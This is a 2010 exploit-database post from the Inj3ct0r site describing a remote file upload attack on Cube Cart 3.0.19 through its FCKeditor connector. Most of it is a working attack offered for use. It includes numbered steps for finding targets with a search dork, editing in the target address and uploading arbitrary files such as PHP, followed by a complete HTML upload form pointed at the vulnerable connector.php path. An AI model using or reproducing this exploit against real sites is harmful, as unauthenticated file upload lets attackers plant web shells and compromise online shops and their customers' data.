Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Cube Cart 3.0.19 FCKeditor Remote Upload File Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================
Cube Cart 3.0.19 FCKeditor Remote Upload File Exploit
=====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /’ __ /’__` / __ /’__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /’ _ ` / /_/__&lt;_ /’___ / /`’__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ &gt;&gt; Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ####################################### 1
0 I’m indoushka member from Inj3ct0r Team 1
1 ####################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

########################################################################

# Vendor: http://www.cubecart.com/

# Date: 2010-05-27

# Author : indoushka

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !

# Contact : indoushka@hotmail.com

# Home : www.alkrsan.net

# Bug : Remote Upload File Exploit

# Tested on : windows SP2 Français V.(Pnx2 2.0)

########################################################################

# Dork : Powered By Alegro Cart

# Exploit By indoushka

1 –

[~] 1.Save code html format

[~] 2.Search Target.com

[~] 3.Edit and replace &amp; Target

[~] 4.Save Html Page

[~] 5.Open Page Html (Edite Source)

[~] 6.Set Format PHP

[~] 7.Choose File &amp; Upload

[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml….)

[~] 9.Target.com/images/uploads/File/File Name

2 – code html format

&lt;head&gt;
&lt;title&gt; FCKeditor – By indoushka&lt;/title&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot;&gt;

&lt;/head&gt;
&lt;body&gt;
&lt;table height=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot; width=&quot;100%&quot;
border=&quot;0&quot;&gt;
&lt;tr&gt;

&lt;td&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;0&quot; border=&quot;0&quot;&gt;
&lt;tr&gt;
&lt;td&gt;
Connector:&lt;br /&gt;
&lt;select id=&quot;cmbConnector&quot; name=&quot;cmbConnector&quot;&gt;
&lt;option value=&quot;asp/connector.asp&quot; selected=&quot;selected&quot;&gt;ASP&lt;/option&gt;
&lt;option value=&quot;aspx/connector.aspx&quot;&gt;ASP.Net&lt;/option&gt;

&lt;option value=&quot;cfm/connector.cfm&quot;&gt;ColdFusion&lt;/option&gt;
&lt;option value=&quot;lasso/connector.lasso&quot;&gt;Lasso&lt;/option&gt;
&lt;option value=&quot;perl/connector.cgi&quot;&gt;Perl&lt;/option&gt;
&lt;option value=&quot;

http://127.0.0.1/commerce/admin/includesrteeditorfilemanagerbrowserdefaultconnectorsphp/connector.php

&quot;&gt;PHP&lt;/option&gt;
&lt;option value=&quot;py/connector.py&quot;&gt;Python&lt;/option&gt;
&lt;/select&gt;

&lt;/td&gt;
&lt;td&gt;
&lt;/td&gt;
&lt;td&gt;
Current Folder&lt;br /&gt;
&lt;input id=&quot;txtFolder&quot; type=&quot;text&quot; value=&quot;/&quot; name=&quot;txtFolder&quot; /&gt;&lt;/td&gt;
&lt;td&gt;
&lt;/td&gt;

&lt;td&gt;
Resource Type&lt;br /&gt;
&lt;select id=&quot;cmbType&quot; name=&quot;cmbType&quot;&gt;
&lt;option value=&quot;File&quot; selected=&quot;selected&quot;&gt;File&lt;/option&gt;
&lt;option value=&quot;Image&quot;&gt;Image&lt;/option&gt;
&lt;option value=&quot;Flash&quot;&gt;Flash&lt;/option&gt;
&lt;option value=&quot;Media&quot;&gt;Media&lt;/option&gt;

&lt;option value=&quot;Invalid&quot;&gt;Invalid Type (for testing)&lt;/option&gt;
&lt;/select&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br /&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;0&quot; border=&quot;0&quot;&gt;
&lt;tr&gt;

&lt;td valign=&quot;top&quot;&gt;
&lt;a href=&quot;#&quot; onclick=&quot;GetFolders();&quot;&gt;Get Folders&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;/td&gt;
&lt;td valign=&quot;top&quot;&gt;
&lt;a href=&quot;#&quot; onclick=&quot;GetFoldersAndFiles();&quot;&gt;Get Folders and Files&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;/td&gt;

&lt;td valign=&quot;top&quot;&gt;
&lt;a href=&quot;#&quot; onclick=&quot;CreateFolder();&quot;&gt;Create Folder&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
&lt;/td&gt;
&lt;td valign=&quot;top&quot;&gt;
&lt;form id=&quot;frmUpload&quot; action=&quot;&quot; target=&quot;eRunningFrame&quot; method=&quot;post&quot;
enctype=&quot;multipart/form-data&quot;&gt;
File Upload&lt;br /&gt;
&lt;input id=&quot;txtFileUpload&quot; type=&quot;file&quot; name=&quot;NewFile&quot; /&gt;

&lt;input type=&quot;submit&quot; value=&quot;Upload&quot; onclick=&quot;SetAction();&quot; /&gt;
&lt;/form&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br /&gt;
URL: &lt;span id=&quot;eUrl&quot;&gt;&lt;/span&gt;
&lt;/td&gt;

&lt;/tr&gt;
&lt;tr&gt;
&lt;td height=&quot;100%&quot; valign=&quot;top&quot;&gt;
&lt;iframe id=&quot;eRunningFrame&quot; src=&quot;javascript:void(0)&quot; name=&quot;eRunningFrame&quot;
width=&quot;100%&quot;
height=&quot;100%&quot;&gt;&lt;/iframe&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;
&lt;/html&gt;

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH
———————————————————————————————————————————

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-08-01]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13537